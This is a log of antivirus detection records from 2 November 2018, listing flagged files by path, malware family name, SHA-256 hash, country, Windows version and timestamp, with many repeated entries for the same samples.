  Row(detection=Row(filename='hulk.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\HULK\\HULK.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-222507-03fcbb43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a387ab3\\AVSCAN-20181101-222221-F680730A\\AVSCAN-20181101-222507-03FCBB43', filesize=2176000, name='TR/Dldr.Delphi.Gen.#M1.#R1'), hash='11ba6af1aaa595f2aba234febbe5d09c95052e743025b0d9ad91722fc9511551', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T00:25:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ly4ezxm_ywu.html', filepath='K:\\DRIVE E\\RIYAN\\RIYAN`s\\SKRIPSI & TESIS\\WILAS\\Tanah\\Aspek dan Implikasi Hukum dalam Pendaftaran Tanah dan Penertiban Sertifikat Hak-Hak atas Tanah - hukumonline.com_files\\lY4eZXm_YWu.html', filesize=56000, name='W32/Chir.B.#M1.#R1'), hash='1d5d761e685142f38b514b6c503d1f1f009175527a23545a9ed92aefb778aa8f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:29:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_vo.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\cw\\_VO\\_VO.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050401-aeabeb81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050401-AEABEB81', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051508-3cade961', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051508-3CADE961', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184623-f06b974a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_470893eb\\AVSCAN-20181102-184531-E633ADEE\\AVSCAN-20181102-184623-F06B974A', filesize=128000, name='W97M/Agent.70420299.#M1.#R1'), hash='5931fbfdefaf9688b21ca1bd6de7aab4662e6ab31107518218ad430c3226848e', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:46:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T04:09:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061412-7d043ae1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061412-7D043AE1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125751-fd74e802', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-125751-FD74E802', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:00:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-190815-765ed3f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae272576\\AVSCAN-20181102-190557-60FA6A79\\AVSCAN-20181102-190815-765ED3F7', filesize=1792000, name='ADWARE/OffersWizard.1792000.#M1.#R1'), hash='68a5b5b209642b4dc351172859cb0cb7cdc19e6cdcbebc49be2b1209ea99e657', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:08:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061239-45a4830c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061239-45A4830C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054616-9609d362', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054616-9609D362', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050334-9e940f61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050334-9E940F61', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061405-7870ec3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061405-7870EC3D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154625-54e0d068', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-154625-54E0D068', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:49:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061944-42dc6ede', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061944-42DC6EDE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061239-4564ee36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061239-4564EE36', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053107-77dae7fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053107-77DAE7FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='$rtccj6b.dll', filepath='\\\\?\\C:\\System Volume Information\\SystemRestore\\FRStaging\\$Recycle.Bin\\S-1-5-21-3908036811-2305201255-150741693-1000\\$RTCCJ6B.dll', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='6695e4887ac97cfc706963bd3faa47dc96aff614561b1aa403898b71462b3ef7', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eularesda_dk.dll', filepath='D:\\soft\\Adobe photoshop cs2\\AutoPlay\\eularesda_DK.dll', filesize=156000, name='W32/Ramnit.C.#M0.#R0'), hash='6aa643738ce86dddf45d56cc0663e45c248764635571bd884995c0c1cd1e5826', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061209-339d49d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061209-339D49D4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143328-2777beae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-143328-2777BEAE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf_contract agreement.tar --> j111.exe', filepath='pdf_CONTRACT AGREEMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T06:52:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050351-a9280d63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050351-A9280D63', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054236-12aa3690', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054236-12AA3690', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054024-c3ebce85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054024-C3EBCE85', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054943-113eaa91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054943-113EAA91', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062657-44f9d0a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062657-44F9D0A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050421-bb1395f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050421-BB1395F9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060229-da0e8420', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060229-DA0E8420', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053015-595c74eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053015-595C74EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052342-6ebb0759', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052342-6EBB0759', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061831-171c11ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061831-171C11AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054754-d087ca40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054754-D087CA40', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050944-7b9dd782', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050944-7B9DD782', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050445-c902ad40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050445-C902AD40', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061059-09adb8b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061059-09ADB8B5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053058-72a0f85b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053058-72A0F85B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062042-65229f5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062042-65229F5D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052038-01541865', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052038-01541865', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051601-5c191dc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051601-5C191DC0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062441-f385e40a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062441-F385E40A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061109-10001b3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061109-10001B3C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051828-b3ee352f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051828-B3EE352F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:27Z'), dt=datetime.date(2018, 11, 2)),
